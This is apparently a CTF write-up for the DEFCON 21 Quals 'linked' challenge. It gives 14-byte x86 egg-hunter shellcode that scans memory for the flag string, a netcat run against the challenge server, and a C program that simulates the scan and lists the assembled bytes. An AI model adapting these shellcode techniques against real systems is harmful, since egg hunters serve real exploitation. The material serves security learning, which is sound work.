linked was a shellcoding challenge worth 3 points at DEFCON 21 CTF Quals
http://assets.shallweplayaga.me/linked.txt Running at linked.shallweplayaga.me:22222 OR linked2.shallweplayaga.me:22222
linked.txt:
typedef struct _llist {
struct _llist *next;
uint32_t tag;
char data[100];
} llist;
and:
register char *answer;
char *(*func)();
llist *head;
...
func = (char *(*)(llist *))userBuf;
answer = (char *)(*func)(head);
send_string(answer);
exit(0);
Write me shellcode that traverses the randomly generated linked list, looking for a node with a tag 0x41414100, and returns a pointer to the data associated with that tag, such that the call to send_string will output the answer.
Tests showed that linked was running on x86. After trying to write and optimize shellcode to do the job, I thought of an easier attack vector: instead of walking the list to find the node with the given tag, scan memory for the key directly (all keys start with "The key is:"), much like an egg hunter. The shellcode came out at 14 bytes, a whole 2 bytes under the 16-byte limit :). Note that the scan starts at the list head and walks upward with no bound, so it relies on the key string sitting above head in memory; if the egg were never found, the loop would run off the end of the mapping and crash.
Code:
bits 32
pop edx            ; return address pushed by the call
pop eax            ; first argument: head of the list
mov ebx, 'The '    ; the egg, stored as "The " in memory order
_loop:
inc eax            ; scan one byte at a time, starting at head+1
cmp [eax], ebx     ; 4-byte window == "The "?
jnz _loop
jmp edx            ; "return" to the caller with eax pointing at the key
; yep, i can afford nops
nop
nop
See it in action:
x-n2o@istari:~$ nasm linked.asm -o linked
x-n2o@istari:~$ nc linked.shallweplayaga.me 22222 < linked
List built. Send me your shellcode. Max size: 16
The key is: Who says ESP isn't general purpose!?!?
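The two strategies contrasted above, as an added example in C that is not part of the original writeup or the challenge: the intended list walk (find_by_tag), a simulation of the memory scan the shellcode performs (egg_hunt), and the hand-assembled bytes of the listing above so the 14-byte count can be checked. The list, its tags and the key string are constructed here; the scan is bounded by the end of the arena, which the real shellcode is not.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Struct from linked.txt. */
typedef struct _llist {
    struct _llist *next;
    uint32_t tag;
    char data[100];
} llist;

#define KEY_TAG 0x41414100u   /* tag the challenge asks for */
#define NNODES  8             /* size of the constructed list */

/* The 14 bytes nasm emits for the listing above (hand-assembled here,
   not copied from the post), one instruction per line. */
static const unsigned char shellcode[] = {
    0x5a,                          /* pop edx          ; return address      */
    0x58,                          /* pop eax          ; arg 0: head         */
    0xbb, 0x54, 0x68, 0x65, 0x20,  /* mov ebx, 'The '  ; "The " memory order */
    0x40,                          /* _loop: inc eax                         */
    0x39, 0x18,                    /* cmp [eax], ebx                         */
    0x75, 0xfb,                    /* jnz _loop        ; rel8 = -5           */
    0xff, 0xe2,                    /* jmp edx          ; back to caller      */
};

size_t shellcode_len(void) { return sizeof shellcode; }

/* The egg as a host-endian word, i.e. exactly what `cmp [eax], ebx` sees. */
static uint32_t egg_word(void) {
    uint32_t w;
    memcpy(&w, "The ", 4);
    return w;
}

/* Nodes live in one arena so the simulated scan never leaves mapped memory. */
static llist arena[NNODES];

const void *arena_end(void) { return arena + NNODES; }

/* Constructed list: sequentially linked nodes with random tags; the key node
   (tag 0x41414100, data = key) sits at a random position after the head. */
llist *build_list(const char *key, unsigned seed) {
    srand(seed);
    int key_idx = 1 + rand() % (NNODES - 1);
    for (int i = 0; i < NNODES; i++) {
        uint32_t t;
        do { t = (uint32_t)rand(); } while (t == KEY_TAG || t == egg_word());
        arena[i].next = (i + 1 < NNODES) ? &arena[i + 1] : NULL;
        arena[i].tag = (i == key_idx) ? KEY_TAG : t;
        memset(arena[i].data, 0, sizeof arena[i].data);
        if (i == key_idx)
            snprintf(arena[i].data, sizeof arena[i].data, "%s", key);
        else
            snprintf(arena[i].data, sizeof arena[i].data, "filler node %d", i);
    }
    return &arena[0];
}

/* Intended solution: follow next pointers until the tag matches. */
const char *find_by_tag(const llist *head, uint32_t tag) {
    for (const llist *n = head; n != NULL; n = n->next)
        if (n->tag == tag)
            return n->data;
    return NULL;
}

/* What the shellcode does: from head+1 upward, compare each 4-byte window
   with "The " and return the first hit. The real loop has no upper bound
   (it would fault past the mapping); `end` is added here for safety. */
const char *egg_hunt(const void *head, const void *end) {
    const unsigned char *p = (const unsigned char *)head + 1;  /* inc eax first */
    const unsigned char *last = (const unsigned char *)end - 4;
    uint32_t egg = egg_word();
    for (; p <= last; p++) {
        uint32_t w;
        memcpy(&w, p, 4);          /* unaligned load, as cmp [eax], ebx */
        if (w == egg)
            return (const char *)p;
    }
    return NULL;
}

int main(void) {
    llist *head = build_list("The key is: constructed sample key", 7);
    printf("shellcode: %zu bytes (limit 16)\n", shellcode_len());
    printf("by tag:    %s\n", find_by_tag(head, KEY_TAG));
    printf("egg hunt:  %s\n", egg_hunt(head, arena_end()));
    return 0;
}
```

Both functions return the same pointer because the key node's data field begins with "The ", which is why the egg hunter can stand in for the tag search; the bound passed to egg_hunt is the safety margin the 14-byte version gives up.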
~ X-N2O